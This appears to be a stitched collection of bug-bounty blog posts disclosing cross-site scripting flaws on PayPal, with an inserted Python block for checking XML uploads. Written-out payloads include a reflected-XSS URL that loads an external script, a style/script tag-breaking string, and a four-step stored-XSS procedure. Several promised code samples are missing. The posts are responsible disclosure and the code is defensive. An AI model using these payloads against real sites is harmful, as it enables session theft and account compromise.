Greetings readers, today I want to share with you one of my latest findings on Paypal.com. When creating an invoice, Paypal allows users to upload attachments for the invoice; one attachment type they allow is an XML file. What the developer may have missed here is that you can actually insert HTML into XML files; the namespace that allows this for XML files is called xmlns, and a valid xmlns file would look something like this:
When I uploaded a file with this content and the ending .xml, the interpreter on Paypal's site executed the payload (in this case the alert(1)). To fulfill the requirements for a bounty you always have to make such a vulnerability exploitable and therefore a risk for other Paypal users. In this case it was pretty easy: you could either send the link to this file directly (it doesn't matter whether the user is logged in or not) or you send it with the invoice and wait for the user to click on it.
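As an added example (not part of the original post or of Paypal's code), this is the kind of check an upload handler could run on an XML attachment: it parses the file and flags any element that lives in a namespace browsers render as active content (XHTML being the case above), and it builds the response headers that make a stored file download instead of render. The namespace list, the function names and the sample documents are my own assumptions.

```python
import xml.etree.ElementTree as ET

# Namespaces whose elements a browser renders as active content when an XML
# document is opened directly. XHTML is the case from the write-up; SVG and XSLT
# are included because the same rendering behaviour applies (assumed list).
ACTIVE_CONTENT_NS = {
    "http://www.w3.org/1999/xhtml",
    "http://www.w3.org/2000/svg",
    "http://www.w3.org/1999/XSL/Transform",
}


def find_active_content(xml_bytes: bytes) -> list:
    """Return the qualified names of elements in a browser-rendered namespace,
    or [] if the document looks inert. Raises ET.ParseError on malformed XML.
    For production, parse with defusedxml to also block entity-expansion tricks."""
    root = ET.fromstring(xml_bytes)
    hits = []
    for elem in root.iter():
        tag = elem.tag  # ElementTree encodes namespaced tags as "{uri}local"
        if tag.startswith("{"):
            uri, _local = tag[1:].split("}", 1)
            if uri in ACTIVE_CONTENT_NS:
                hits.append(tag)
    return hits


def attachment_is_safe(xml_bytes: bytes) -> bool:
    """Reject malformed XML, browser-rendered namespaces, and stylesheet PIs
    (ET.fromstring drops processing instructions, so check the raw bytes)."""
    try:
        if find_active_content(xml_bytes):
            return False
    except ET.ParseError:
        return False
    return b"<?xml-stylesheet" not in xml_bytes


def download_headers(filename: str) -> dict:
    """Headers to serve user-uploaded XML with: a non-renderable type plus a
    forced download means even a payload the check missed never executes."""
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


# Constructed samples: a plain invoice and an XHTML-namespaced document, which a
# browser would render as HTML (flagged by namespace alone, no script needed).
BENIGN = b'<?xml version="1.0"?><invoice><total currency="EUR">12.50</total></invoice>'
XHTML_DOC = b'<html xmlns="http://www.w3.org/1999/xhtml"><body><p>invoice</p></body></html>'
```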
Here is the POC I sent in to the Paypal bug bounty team:
If you have questions on this particular case, please don't hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com
All the best
Dear followers, I found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following payload:
&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E
The vulnerable parameter was the q parameter; I was able to break the script context of the page. I think it was because of the &q parameter, but I am not sure, as Paypal fixed this issue too fast so I couldn't analyze it more in depth :/
https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E
Here is my POC I sent in to Paypal:
Hope you enjoyed! If you have any kind of question please don't hesitate to ask me, either here or via email at patrik.fehrenbach(at)it-securityguard.com
All the best
Patrik
"--></style></ script >< script > alert ("XSS ")</ script >
By ending the previous style and script elements it was possible to add a new script element and execute the payload; the complete URL now looks like this:
This one only worked in Firefox; Chrome and IE restricted the execution with their anti-XSS feature.
The bug was categorized as "Out of Scope" for whatever reason.
Hope you enjoyed, if you have any questions left, please don't hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com
I recently discovered a stored cross site scripting vulnerability on Paypal's core site. The scenario is a bit weird, but I hope to explain everything as well as possible.
But when I tried to complete the registration, the security module of Paypal showed me an error that there was some kind of problem with my request. When I looked at the URL I saw that there was some kind of progress bar
To summarize the process:
1. Create an account with the malicious payload
2. At the point where the Paypal system stops you from continuing, erase the URL back to /webapps/ (this bypassed the security restriction)
3. Create an invoice and send it to the victim
4. The victim logs into the account and the payload gets executed
I did a small POC video which describes the impact:
I hope you enjoyed 🙂